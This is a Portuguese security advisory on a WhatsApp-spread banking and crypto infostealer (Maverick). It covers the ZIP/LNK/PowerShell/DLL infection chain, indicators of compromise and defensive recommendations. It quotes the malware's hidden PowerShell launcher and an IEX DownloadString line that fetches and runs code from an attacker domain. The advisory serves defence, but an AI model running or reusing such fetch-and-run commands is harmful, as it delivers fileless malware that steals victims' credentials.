Foi identificada uma campanha de malware que está sendo divulgada pelo Whatsapp, semelhante a ocorrida em fevereiro deste ano. Desta vez, o malware está utilizando termos como “comprovante” ou “PED“, para atrair atenção das vítimas, solicitando que o arquivo seja aberto em um computador, e não pelo celular:
Em uma análise inicial foi possível identificar comportamento de infostealer no arquivo malicioso, ou seja, foco no roubo de credenciais e informações da máquina infectada. O malware está sendo distribuído em formato Zip (arquivo comprimido), e dentro da pasta compactada, existe um arquivo “.LNK” (extensão de atalhos para Windows), o qual, por fim, executa um script Powershell:
powershell.exe -w hid -enc SQBFAFg[texto codificado em base 64]…
Este script utiliza a ação que codifica o comando de instalação de execução do próximo payload para o malware:
IEX (New-Object Net.WebClient).DownloadString(‘https://servetenopote[.com/%5B…%5D’)
Ao analisar de forma aprofundada este comando, temos o seguinte:
• (New-Object Net.WebClient).DownloadString: função para buscar o código armazenado remotamente e salvar a string em memória;
• IEX (Invoke-Expression): executa o script que foi salvo pelo comando anterior
Durante esta fase, o arquivo malicioso baixado está sendo executado diretamente em memória, ou seja, não está salvando nenhum novo arquivo no disco da máquina, configurando uma ação fileless.
Realizamos a análise inicial da campanha e a equipe de Threat Intelligence segue investigando para identificar quais os principais riscos deste malware às vítimas e, possivelmente, à organizações que tiverem seus colaboradores comprometidos.
Recomendações gerais:
• Atualização e instalação imediata do antimalware em todas as máquinas;
• Realizar uma campanha de conscientização para colaboradores não baixarem arquivos, principalmente, de contatos não confiáveis do Whatsapp, assim como evitar a instalação de quaisquer arquivos Zip, LNK, PS1, etc;
• Criar regras de bloqueio para execução de scripts Powershell nas máquinas que não necessitam desta funcionalidade;
• Bloquear nas ferramentas os seguintes IOCs que estão ativos no momento da campanha: zapgrande[.]com, sorvetenopote[.]com, expansiveuser[.]com, ogoampoodopet[.]com e 109.176.30.141;
• Uso de MFA em todos os serviços da organização, com foco em contas bancárias e de tecnologias internas;
• É possível que o malware tenha a capacidade de comprometer o Whatsapp das máquinas infectadas, sendo assim, é necessário manter o dobro de atenção a quaisquer arquivos recebidos via Whatsapp, incluindo de contatos confiáveis.
Atualização 03/10/2025
O seguimento das análises confirmou que o malware trata-se, de fato, de um infostealer com foco em roubo de contas bancárias e de criptomoedas. Além disso, foi possível evidenciar a funcionalidade de replicação para contatos das vítimas via Whatsapp Web, e em alguns casos, utilizando o aplicativo Whatsapp do celular. O malware possui pelo menos três fases de execução mapeadas, sendo que o DLL é carregado totalmente na memória, sem criar arquivos em disco, sendo assim, fileless:
ZIP → LNK → Powershell → DLL → EXE → Bat (persistência via pasta Startup)
No momento este malware mostrou grande semelhança com o Coyote (utilizado no início do ano em campanha semelhante), mas estas amostras em específico foram nomeadas como Maverick. A figura abaixo mostra a análise estática de um executável da campanha, no qual o arquivo detecta o uso de browser e nomes de bancos específicos.
A TrendMicro compartilhou alguns dos IOCs associados a esta campanha, incluindo hashes, IPs e domínios utilizados pelos atacantes, podem ser acessados pelo link. Reforçamos as recomendações:
- • Manter o EDR atualizado, adicionando os IOCs disponibilizados;
- • Limitar o uso do Powershell a somente máquinas de usuários que necessitam dessa permissão;
- • Desabilitar o download automático de arquivos do Whatsapp;
- • Conscientizar os colaboradores sobre essa campanha de malware, orientando que não instalem arquivos ZIP chegados em conversas do Whatsapp;
EXE: https://bazaar.abuse.ch/sample/8646a46ef0988ca44edd112fac6988a6f9426c9ac1abdbe76069b71c4f1c4664/
ZIP contendo LNK: Analysis ComprovanteSantander-41674331.946233716.zip (MD5: 2C3BBA26C330D5FE779D6622A1C76A43) Malicious activity – Interactive analysis ANY.RUN